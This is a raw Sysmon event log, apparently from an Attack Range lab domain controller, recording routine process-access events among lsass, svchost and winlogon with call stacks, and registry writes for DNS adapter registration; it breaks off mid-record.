12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60CDC3F6A4C6824D264B956BED2C14F,SHA256=B5F03219D7C7B44E7455D3B2A9F6E9797F3FD1A6E75110C867D72C790170F2A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.435{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 13241300x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.171{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+